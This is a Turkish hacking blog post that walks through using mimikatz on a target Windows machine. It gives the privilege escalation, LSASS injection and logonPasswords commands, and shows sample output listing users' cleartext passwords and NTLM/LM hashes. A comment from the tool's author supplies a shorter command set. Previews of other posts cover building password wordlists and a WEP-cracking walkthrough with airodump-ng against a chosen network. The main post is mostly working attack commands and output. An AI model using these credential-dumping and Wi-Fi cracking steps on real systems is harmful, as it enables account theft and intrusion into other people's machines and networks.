Ana içeriğe atla

Mimikatz ile Aktif Kullanıcı Parolalarını Almak

Hedef sistem üzerinde aktif olarak oturum açmış kullanıcı hesaplarına ait parolalar mimikatz aracı ile salt metin (clear text) olarak alınabiliyor.

Bunun için yapılması gereken mimikatz aracının hedef sisteme yüklemek, çalıştırmak ve ardından sekurlsa.dll dosyasını enjekte ederek, @getLogonPasswords komutu ile aktif oturumların parolalarını almak...

C:\mimi>mimikatz
mimikatz 1.0 x86 (RC)    /* Traitement du Kiwi (Oct 13 2012 13:47:20) */
// http://blog.gentilkiwi.com/mimikatz
...
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
...
mimikatz # inject::service samss sekurlsa.dll
...
mimikatz # @getLogonPasswords full 
Bu komutun ardından aktif olarak oturum açmış bulunan kullanıcı hesaplarına ait açık haldeki parolalar ve hash bilgileri aşağıdaki gibi listelenecektir. Aşağıda kırmızı ile işaretlediğim "Mot de passe:" başlıkları altında kullanıcı parolalarının listelendiğini görebilirsiniz...

Authentification Id         : 0;242741
Package d'authentification  : NTLM
Utilisateur principal       : oem
Domaine d'authentification  : oem-Bilgisayar
    msv1_0 :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Hash LM      : b42c04ccf43253bbaad3b435b51404ee
     * Hash NTLM    : ebe666e1cfd412358a0977fef42c76dd
    wdigest :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    tspkg :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat
    kerberos :     
     * Utilisateur  : oem
     * Domaine      : oem-Bilgisayar
     * Mot de passe : coslat


Authentification Id         : 0;137629
Package d'authentification  : NTLM
Utilisateur principal       : user
Domaine d'authentification  : oem-Bilgisayar
 msv1_0 :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Hash LM      : 2b3137035a2b985b08bd455a508ea203
  * Hash NTLM    : d4605c09dbb7d109ff993066671b72ac
 wdigest :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 tspkg :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6
 kerberos :  
  * Utilisateur  : user
  * Domaine      : oem-Bilgisayar
  * Mot de passe : y1h2n3u4j5m6

Gentil Kiwi tarafından yapılan yorumdan sonra gelen düzenleme:
Aktif parola listesini almak için aşağıdaki komutları vermek yeterli olacakmış. İşleri bu kadar uzatmaya gerek yokmuş...

C:\mimi>mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full


Yorumlar

  1. Does not need injection anymore :
    privilege::debug
    sekurlsa::logonPasswords full

    ;)

    YanıtlaSil
  2. @Gentil Kiwi, Thanks a lot :)

    YanıtlaSil

Yorum Gönder

Bu blogdaki popüler yayınlar

Crunch ile Wordlist Oluşturmak

Crunch seçilen karakter kümesinden, istenilen uzunlukta parolalar üreten ve bu parolaları bir dosyaya yazarak wordlist oluşturan kullanışlı bir araçtır. Çalışmak için özel bir yetkiye ihtiyaç duymaz. Yalnızca derlenip çalıştırılması yeterlidir. Çalıştığında istenilen karakter kümesinden parolalar üretir ve bir dosyaya yazar.
Oldukça hızlı çalışır ve kolay kullanılır.



Crunch Kurulumu
Öncelikle crunch yazılımını indirelim.
harun@gondor:~$ wget http://garr.dl.sourceforge.net/project/crunch-wordlist/crunch-wordlist/crunch-3.0.1.tgz
İndirme işlemi bittikten sonra crunch-3.0.1.tgz arşivini açalım.

harun@gondor:~$ tar zxvf crunch-3.0.1.tgz crunch3.0/ crunch3.0/Makefile crunch3.0/GPL.TXT crunch3.0/crunch.1 crunch3.0/charset.lst crunch3.0/crunch.cArşivin açılmasıyla oluşan crunch3.0/ dizinine geçelim ve ardından make komutunu vererek derleme işlemini başlatalım.
harun@gondor:~$ cd crunch3.0/ harun@gondor:~/crunch3.0$ make Building binary... /usr/bin/gcc -Wall -lm -pthread -std=c99 -m32 -D_LARGEF…

Linux Kullanıcı ve Grup İşlemleri

Linux sistemlerde yeni bir kullanıcı eklemek için useradd komutu kullanılabilir. Aşağıdaki komut hakan isminde yeni bir kullanıcı hesabı açacaktır.

root@gondor:/home# useradd -m  -G admin,cdrom  hakan
-m paramesi kullanıcı için ev dizini oluşturulmasını sağlar.
-G parametresi kullanıcının üye olduğu grupları belirtir.

Şimdi hakan kullanıcına parolasını atamak için passwd komutunu kullanalım.

root@gondor:/home# passwd hakan Yeni parolayı girin: Yeni parolayı tekrar girin: passwd: şifre başarıyla güncellendi
Şimdi hakan kullanıcısını "disk" grubuna eklemek için aşağıdaki gibi bir komut verelim.

root@gondor:/home# usermod -a -G disk hakan
Bakalım hakan kullanıcısı hangi gruplara üyeymiş. Bunun için id komutunu "id kullanıcıadı" şeklinde kullanalım.
root@gondor:/home# id hakan uid=1001(hakan) gid=1001(hakan) gruplar=1001(hakan),6(disk),24(cdrom),118(admin)
Yukarıdaki çıktıya göre hakan kullanıcısı hakan, disk,cdrom ve admin gruplarına üyeymiş. Şimdi hakan kullanıcısını …

Aircrack ile WEP Crack

İlk olarak airmon-ng aracıyla wlan0 kablosuz ağ arayüzünden, dinleme ve paket sokuşturma işlemleri için kullanacağımız mon0 isimli sanal ağ arayüzünü oluşturalım.

airmon-ng start wlan0
Bu komutun ardından ekran çıktısı aşağıdaki gibi olacaktır...



Dinleme ve paket sokuşturma işlemlerini yapacağımız mon0 arayüzü oluştuğuna göre şimdi etrafımızdak kablosuz ağları tespit edelim. Bunun için airodum-ng aracını aşağıdaki gibi kullanabiliriz.

airdump-ng mon0

airodump-ng yukarıkdakine benzer şekilde çevrenizdeki kablosuz ağları listeleyecektir. Benim örneğimde yalnızca evde kullandığım kablosuz ağım yer alıyor. Dolayısıyla hedefdeki kablosuz ağ Seker isimli WEP şifreli kablosuz olacak...

Hedef ağı tespit ettikten sonra Ctrl+C tuş kombinasyonuyla airodump-ng aracını durduralım ve daha sonra yalnızca hedef ağı dinleyecek şekilde tekrar başlatalım.

airodump-ng -c 6 --bssid 00:a0:c5:98:1f:f9 -w Seker mon0
Bu komut -c parametresi ile 6. kanalı, --bssid parametresi ile MAC adresi verilen kablosuz ağ no…